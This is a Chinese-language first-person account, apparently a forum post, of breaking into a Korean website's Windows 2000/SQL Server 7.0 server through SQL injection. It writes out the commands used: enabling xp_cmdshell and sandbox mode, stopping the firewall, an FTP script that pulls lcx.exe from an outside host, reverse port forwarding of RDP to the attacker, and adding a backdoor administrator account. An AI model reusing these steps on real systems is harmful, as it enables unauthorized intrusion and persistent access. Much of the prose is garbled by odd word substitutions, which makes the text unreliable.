下午搞了一個站，存在sa注入點裂痕，，window 2000+iis5。

通過注入點信息，發明sqlserver版本為7.00，以前見過一次這個版本，不外沒有怎么深入研究，伴侶掃弱口令掃描到的，其時也提權了，詳細健忘怎么提的了。附圖。

。

掃描這個ip地點發明只對外開放了53跟80，韓國的鳥站，由此揣摩大概為內網可能外網可是限制了對外開放的端口。一般環境下會開啟1433，跟3389的可是限制對外毗連。

sqlserver7.0的固然以前搞過，可是健忘詳細怎么弄了，于是一步一步的先用穿山甲自帶的成果規復xp_cmdshell,sp_oa**,sp_***job,尚有一個sandboxmode沙盒模式。都開啟之后，隨便執行set，ipconfig等呼吁發明沒有回顯，也不知道哪個組件可以呼吁。于是想到一個步伐。

此刻我本機執行lcx -listen 77 88通過77端口監聽外部來的數據。然后在穿山甲里執行net stop sharedaccess通過xp_cmdshell,然后sp_oa**,sp_***job,沙盒模式一一執行，固然不知道樂成沒，可是假如可以執行呼吁，必定可以樂成，目標是為了是對方呆板能對外發送數據。接著跟適才一樣執行telnet 我的ip 22端口，最終發明通過沙盒模式可以執行呼吁。

可是對方的3389不答允毗連，這時候想通過lcx端口轉發來毗連對方的3389，固然不確定是3389可是碰碰命運。

個中的ftp傳文件下載文件我親自測試過，就用這個了。

echo open www.ftp.com>ftp.TXT //毗連FTP
echo username>>ftp.TXT       //輸入用戶名
echo password>>ftp.TXT       //輸入暗碼
echo get lcx c:lcx.exe>>ftp.TXT //執行下載呼吁
echo bye>>ftp.TXT             //退出
ftp -s:ftp.txt                //執行FTP.TXT文件中的FTP呼吁
在穿山甲里依次執行以下語句，假如沒有非凡環境。lcx就下載到對方呆板c盤目次下了。

然后通過沙河模式執行c:/lcx.exe -slave 我的ip 77 127.0.0.1 3389

本機執行lcx -listen 77 88。

過了一小會發明有數據返回，證明lcx已經傳上去了，而且將對方3389端口轉發到本機上了。

本機再毗連127.0.0.1:88，可以毗連上終端，然后在穿山甲執行添加用戶的呼吁net user user password /add

net localgroup administrators user /add毗連終端，樂成登岸。如圖。

中間碰著一些問題就不說了。有什么疑問的可以提出來。